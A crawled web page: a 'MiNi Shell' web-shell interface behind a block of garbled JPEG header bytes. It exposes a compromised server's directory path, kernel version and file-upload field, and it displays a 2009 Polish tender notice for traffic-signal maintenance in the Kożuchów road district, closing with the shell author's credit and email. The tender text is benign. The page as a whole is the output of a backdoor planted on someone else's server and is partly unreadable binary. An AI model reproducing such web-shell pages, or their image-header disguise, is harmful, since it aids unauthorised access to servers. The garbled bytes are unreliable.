JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/46945-N-2009.html

<p class="kh_header"><b>Kożuchów: Konserwacja oraz bieżąca naprawa sygnalizacji świetlnych i znaków aktywnych
na terenie Rejonu Dróg Wojewódzkich w Kożuchowie    
          
Zadanie nr 1 - Konserwacja sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań i nr 289 w m. Lubsko

Zadanie nr 2 - Bieżąca naprawa sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań, nr 289 w m. Lubsko oraz znaków aktywnych przy drodze woj. nr 287 w m. Drożków</b><br>
<b>Numer ogłoszenia: 46945 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Zielonej Górze - Rejon Dróg Wojewódzkich w Kożuchowie , ul. Szprotawska 30, 67-120 Kożuchów, woj. lubuskie, tel. 068 3552614, faks 068 3552615.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oraz bieżąca naprawa sygnalizacji świetlnych i znaków aktywnych
na terenie Rejonu Dróg Wojewódzkich w Kożuchowie    
          
Zadanie nr 1 - Konserwacja sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań i nr 289 w m. Lubsko

Zadanie nr 2 - Bieżąca naprawa sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań, nr 289 w m. Lubsko oraz znaków aktywnych przy drodze woj. nr 287 w m. Drożków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
W Zadaniu nr 1 rzeczowy zakres czynności i obowiązków konserwatora obejmuje utrzymywanie instalacji i urządzeń sygnalizacyjnych w pełnej sprawności technicznej i użytkowej poprzez:
1. Ciągły nadzór nad prawidłową realizacją programów, planów sygnalizacyjnych zgodnych z dokumentacją zatwierdzoną przez Zarządzającego Ruchem.
2. Nadzór nad prawidłowym działaniem układów zabezpieczeń w urządzeniach sterujących.
3. Zapewnienie jednoznaczności i czytelności wyświetlanych sygnałów świetlnych.
4. Prawidłową realizację sygnałów dźwiękowych.
5. Kontrolę prawidłowego stanu zabezpieczeń w układach pomiarowych energii elektrycznej.
6. Kontrolę stanu technicznego i parametrów systemu ochrony przeciwporażeniowej naziemnych urządzeń energetycznych zgodnie z obowiązującymi przepisami.
7. Stały nadzór nad stanem technicznym i parametrami systemów detekcji.
8. Przekazywanie raz w miesiącu raportu o stanie technicznym i parametrach elementów systemu detekcji: wideodetektorów, detektorów elektromagnetycznych, detektorów przyciskowych dla pieszych.
9. Stały nadzór nad stanem technicznym i parametrami systemów synchronizacji i koordynacji.
10. Przekazywanie raz w miesiącu raportu o stanie technicznym i parametrach systemów synchronizacji odpowiedzialnych za sprawne działanie koordynacji na wszystkich ciągach skoordynowanych. 
11. Stały nadzór nad prawidłowym działaniem systemu monitorowania pracy sterowników i pomiarów ruchu. 
12. Przekazywanie raz w miesiącu danych z pomiarów ruchu na wszystkich sterownikach objętych monitoringiem pomiarów ruchu.
13. Przekazywanie w postaci elektronicznej raz w miesiącu wydruków systemowych logów sterownika informujących o zmianach stanów pracy sterowników objętych monitoringiem pracy lub wyposażonych w system zapisu logów. 
14. Przekazywanie na każde życzenie Inwestora wydruków kompletu logów - elektrycznych, awaryjnych, detektorów.
15. Utrzymywanie odpowiedniej stabilności, sztywności i jakości mocowania konstrukcji wsporczych, gwarantujących pełne bezpieczeństwo wszystkim użytkownikom dróg.
16. Usuwanie wszelkich awarii sygnalizacji świetlnej oraz powiadamianie o ich zaistnieniu Rejon Dróg Wojewódzkich w Kożuchowie, oraz dodatkowo w przypadku awarii zasilania natychmiastowe powiadamianie pogotowia ENEA.
17. Utrzymywanie całodobowego stanowiska przyjmującego fakty wystąpienia nieprawidłowości w pracy sygnalizacji świetlnej oraz bezzwłoczne przekazanie ich własnym służbom celem usunięcia. 
18. Prowadzenie Dzienników eksploatacji sygnalizacji oraz rejestrowanie w nich wymaganych informacji w tym o awariach (wraz z godziną rozpoczęcia i zakończenia ich usuwania), remontach i kontrolach pracy sygnalizacji. Sporządzanie, w każdym momencie na żądanie Zamawiającego, raportów o stanie technicznym urządzeń sygnalizacji świetlnej.
19. Wykonywanie pomiarów ochrony przeciwporażeniowej.
20. Dysponowanie osobami przygotowanymi do obsługi urządzeń sterowniczych zainstalowanych na obszarze objętym konserwacją (MSR PDP 2002, MSR 2002) oraz minimum jedną osobą posiadającą doświadczenie projektowe i wykonawcze w zakresie Inżynierii Ruchu (referencje projektowe 5 obiektów, wykonawcze - 2 obiekty).
21. Realizowanie zleceń Zamawiającego dotyczących drobnych korekt aktualnego oprogramowania (np. zmiany w harmonogramie tygodniowym) oraz innych drobnych prac wynikających z poprawy bezpieczeństwa ruchu.
22. Prowadzenie bieżącej oceny stanu technicznego urządzeń oraz wnioskowanie w terminie do dnia 30-go września każdego roku w sprawach dotyczących remontów kapitalnych sygnalizacji świetlnej na skrzyżowaniach objętych konserwacją. 
23. Malowanie w terminie do dnia 1 września malowanych konstrukcji wsporczych, których stan techniczny wymaga takich zabiegów. Czynności te powinny zostać wykonane według sporządzonego przez konserwatora do dnia 30 maja każdego roku harmonogramu (harmonogram powyższych czynności należy uzgodnić z Zamawiającym).
W Zadaniu nr 2 Realizacja przedmiotu zamówienia polega na:
1. Usuwaniu skutków dewastacji lub zdarzeń drogowych i przywróceniu do stanu pierwotnego instalacji sterowania ruchem i znaków aktywnych.
2. Rozbudowie istniejących urządzeń sterowania ruchem i znaków zmiennej treści do nowych warunków pracy lub zwiększających ich funkcjonalność w zmieniających się warunkach ruchu.
3. Wykonywaniu innych prac mających na celu zwiększenie poziomu bezpieczeństwa ruchu drogowego.

Szczegółowy opis przedmiotu zamówienia na zadanie nr 1 i zadanie nr 2 oraz wymagania określone zostały w Rozdziale III SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 w następujący sposób:

 A. posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
       jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 

B. posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, 
     a także dysponują osobami zdolnymi do wykonania zamówienia tj.:
       
O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 w następujący sposób:

    A. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania 
        takich uprawnień;
 
  B. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
   - wykażą się wykonaniem usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest          krótszy - w tym okresie, odpowiadających* swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia,                    z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi         zostały wykonane należycie.

     * przez usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia rozumieć się będzie świadczenie usług:
       - na zadanie nr 1 - w zakresie konserwacji sygnalizacji świetlnych o wartości min. 60.000,00 zł brutto. 
       - na zadanie nr 2 - w zakresie bieżącej naprawy sygnalizacji świetlnych i znaków aktywnych     
         o wartości min. 20.000,00 zł brutto. 

Dopuszcza się sumowanie wartości usług celem uzyskania wymaganej wartości brutto. W przypadku składania oferty przez podmioty występujące wspólnie warunek posiadania doświadczenia zawodowego może być spełniony łącznie.

       C. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
- przedłożą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia na kwotę nie mniejszą niż:
- na zadanie nr 1 - 80.000,00 zł;
- na zadanie nr 2 - 30.000,00 zł;

W przypadku ofert składanych wspólnie, wszyscy partnerzy muszą spełniać warunek sytuacji ekonomiczno-finansowej, tj. przedłożyć polisę lub inny dokument ubezpieczenia o.c. Dopuszcza się sumowanie wartości polis poszczególnych uczestników składających ofertę celem uzyskania wartości nie mniejszej niż:
- na zadanie nr 1 - 80.000,00 zł;
- na zadanie nr 2 - 30.000,00 zł;
D. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie   
     art. 24 ust.1 i 2 Ustawy  Prawo zamówień  publicznych;

 F. udzielą 1-rocznej gwarancji na wykonane usługi - na zadanie nr 2
            (licząc od daty odbioru końcowego przedmiotu umowy).

Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.

Dokonanie oceny spełniania warunków odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów wyszczególnionych w pkt 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia że wykonawca posiada uprawnienia  do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda następujące dokumenty w formie oryginału lub kserokopii poświadczonej przez wykonawcę za zgodność z oryginałem:

1) Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym zwanym dalej zamówieniem;
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub potwierdzony przez organ wydający w danym terminie;
1.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, 
o których mowa w pkt.2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
A) nie otwarto jego likwidacji ani nie ogłoszono upadłości:
B) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
C) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2. Dokument, o którym mowa w pkt . 1 powinien być wystawiony nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie 1 zastępuje się go zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Ważność dokumentu zgodnie z opisem jw.

Celem potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia zamawiający żąda następujących dokumentów:	

3) Wykazu wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest          krótszy - w tym okresie, odpowiadających* swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie.

     * przez usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia rozumieć się będzie świadczenie usług:
       - na zadanie nr 1 - w zakresie konserwacji sygnalizacji świetlnych o wartości min. 60.000,00 zł brutto. 
       - na zadanie nr 2 - w zakresie bieżącej naprawy sygnalizacji świetlnych i znaków aktywnych     
         o wartości min. 20.000,00 zł brutto. 
	
(zał. nr 2 );
Wypełnić zał. DOŚWIACZENIE ZAWODOWE

- dysponowanie personelem odpowiednio przeszkolonym - gwarantującym realizację zamówienia (zał. nr 3 )
Wypełnić zał. WYKAZ PERSONELU;

- posiadają stosowne zaświadczenia, certyfikaty lub uprawnienia nadanych przez producentów sterowników.                 Systemy sterowania oparte są na sterownikach firmy MSR Traffic i SIEMENS. 

4/ Rodzaj powierzonych prac, które wykonawca powierzy podwykonawcom - należy wypełnić załącznik albo wpisać NIE DOTYCZY (zał. nr 4);
5/ Zobowiązanie do współpracy - należy wypełnić załącznik albo wpisać NIE DOTYCZY (zał. nr 5);
6/ Wykaz stawek i narzutów (zał. nr 6)
W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
7/ polisy, a w przypadku jej braku innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia na kwotę nie mniejszą niż:
- na zadanie nr 1 - 80.000,00 zł;
- na zadanie nr 2 - 30.000,00 zł;

Celem potwierdzenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia:
8/ Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust.1 ustawy Prawo zamówień publicznych (zał. nr 1 ).

Oferta oprócz w/w dokumentów ma zawierać:
9/ Formularz oferty (Rozdział II);
Wypełnić druk Formularz oferty. Ofertę należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego; Sporządzenie formularza oferty w innej formie spowoduje odrzucenie oferty.
10/ Wypełniony formularz cenowy (Rozdział IV);
Wypełnić kosztorys ofertowy / formularz cenowy. Kosztorys ofertowy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego. Sporządzenie kosztorysu w innej formie spowoduje odrzucenie oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw.zgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich
Rejon Dróg Wojewódzkich
ul. Szprotawska 30
67-120 Kożuchów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 12:00, miejsce: Zarząd Dróg Wojewódzkich
Rejon Dróg Wojewódzkich
ul. Szprotawska 30
67-120 Kożuchów
pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja oraz bieżąca naprawa sygnalizacji świetlnych i znaków aktywnych
na terenie Rejonu Dróg Wojewódzkich w Kożuchowie    
          
Zadanie nr 1 - Konserwacja sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań i nr 289 w m. Lubsko.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
W Zadaniu nr 1 rzeczowy zakres czynności i obowiązków konserwatora obejmuje utrzymywanie instalacji i urządzeń sygnalizacyjnych w pełnej sprawności technicznej i użytkowej poprzez:
1)	Ciągły nadzór nad prawidłową realizacją programów (planów) sygnalizacyjnych zgodnych z dokumentacją zatwierdzoną przez Zarządzającego Ruchem.
2)	Nadzór nad prawidłowym działaniem układów zabezpieczeń w urządzeniach sterujących.
3)	Zapewnienie jednoznaczności i czytelności wyświetlanych sygnałów świetlnych.
4)	Prawidłową realizację sygnałów dźwiękowych.
5)	Kontrolę prawidłowego stanu zabezpieczeń w układach pomiarowych energii elektrycznej.
6)	Kontrolę stanu technicznego i parametrów systemu ochrony przeciwporażeniowej naziemnych urządzeń energetycznych zgodnie z obowiązującymi przepisami.
7)	Stały nadzór nad stanem technicznym i parametrami systemów detekcji.
8)	Przekazywanie raz w miesiącu raportu o stanie technicznym i parametrach elementów systemu detekcji: wideodetektorów, detektorów elektromagnetycznych, detektorów przyciskowych dla pieszych.
9)	Stały nadzór nad stanem technicznym i parametrami systemów synchronizacji i koordynacji.
10)	Przekazywanie raz w miesiącu raportu o stanie technicznym i parametrach systemów synchronizacji odpowiedzialnych za sprawne działanie koordynacji na wszystkich ciągach skoordynowanych. 
11)	Stały nadzór nad prawidłowym działaniem systemu monitorowania pracy sterowników i pomiarów ruchu. 
12)	Przekazywanie raz w miesiącu danych z pomiarów ruchu na wszystkich sterownikach objętych monitoringiem pomiarów ruchu.
13)	Przekazywanie w postaci elektronicznej raz w miesiącu wydruków systemowych logów sterownika informujących o zmianach stanów pracy sterowników objętych monitoringiem pracy lub wyposażonych w system zapisu logów. 
14)	Przekazywanie na każde życzenie Inwestora wydruków kompletu logów (elektrycznych, awaryjnych, detektorów).
15)	Utrzymywanie odpowiedniej stabilności, sztywności i jakości mocowania konstrukcji wsporczych, gwarantujących pełne bezpieczeństwo wszystkim użytkownikom dróg.
16)	Usuwanie wszelkich awarii sygnalizacji świetlnej oraz powiadamianie o ich zaistnieniu Rejon Dróg Wojewódzkich w Kożuchowie, oraz dodatkowo w przypadku awarii zasilania natychmiastowe powiadamianie pogotowia ENEA.
17)	Utrzymywanie całodobowego stanowiska przyjmującego fakty wystąpienia nieprawidłowości w pracy sygnalizacji świetlnej oraz bezzwłoczne przekazanie ich własnym służbom celem usunięcia. 
18)	Prowadzenie Dzienników eksploatacji sygnalizacji oraz rejestrowanie w nich wymaganych informacji w tym o awariach (wraz z godziną rozpoczęcia i zakończenia ich usuwania), remontach i kontrolach pracy sygnalizacji. Sporządzanie, w każdym momencie na żądanie Zamawiającego, raportów o stanie technicznym urządzeń sygnalizacji świetlnej.
19)	Wykonywanie pomiarów ochrony przeciwporażeniowej.
20)	Dysponowanie osobami przygotowanymi do obsługi urządzeń sterowniczych zainstalowanych na obszarze objętym konserwacją (MSR PDP 2002, MSR 2002) oraz minimum jedną osobą posiadającą doświadczenie projektowe i wykonawcze w zakresie Inżynierii Ruchu (referencje projektowe 5 obiektów, wykonawcze - 2 obiekty).
21)	Realizowanie zleceń Zamawiającego dotyczących drobnych korekt aktualnego oprogramowania (np. zmiany w harmonogramie tygodniowym) oraz innych drobnych prac wynikających z poprawy bezpieczeństwa ruchu.
22)	Prowadzenie bieżącej oceny stanu technicznego urządzeń oraz wnioskowanie w terminie do dnia 30-go września każdego roku w sprawach dotyczących remontów kapitalnych sygnalizacji świetlnej na skrzyżowaniach objętych konserwacją. 
23)	Malowanie w terminie do dnia 1-go września malowanych konstrukcji wsporczych, których stan techniczny wymaga takich zabiegów. Czynności te powinny zostać wykonane według sporządzonego przez konserwatora do dnia 30-go maja każdego roku harmonogramu (harmonogram powyższych czynności należy uzgodnić z Zamawiającym).
Szczegółowy opis przedmiotu zamówienia na zadanie nr 1 i zadanie nr 2 oraz wymagania określone zostały w Rozdziale III SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja oraz bieżąca naprawa sygnalizacji świetlnych i znaków aktywnych
na terenie Rejonu Dróg Wojewódzkich w Kożuchowie    
          
Zadanie nr 2 - Bieżąca naprawa sygnalizacji świetlnych przy drogach wojewódzkich: 
nr 292 w m. Nowa Sól i m. Bytom Odrzański, nr 296 w m. Żagań, nr 289 w m. Lubsko 
oraz znaków aktywnych przy drodze woj. nr 287 w m. Drożków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W Zadaniu nr 2 Realizacja przedmiotu zamówienia polega na:
1)	Usuwaniu skutków dewastacji lub zdarzeń drogowych i przywróceniu do stanu pierwotnego instalacji sterowania ruchem i znaków aktywnych.
2)	Rozbudowie istniejących urządzeń sterowania ruchem i znaków zmiennej treści do nowych warunków pracy lub zwiększających ich funkcjonalność w zmieniających się warunkach ruchu.
3)	Wykonywaniu innych prac mających na celu zwiększenie poziomu bezpieczeństwa ruchu drogowego.
Szczegółowy opis przedmiotu zamówienia na zadanie nr 1 i zadanie nr 2 oraz wymagania określone zostały w Rozdziale III SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com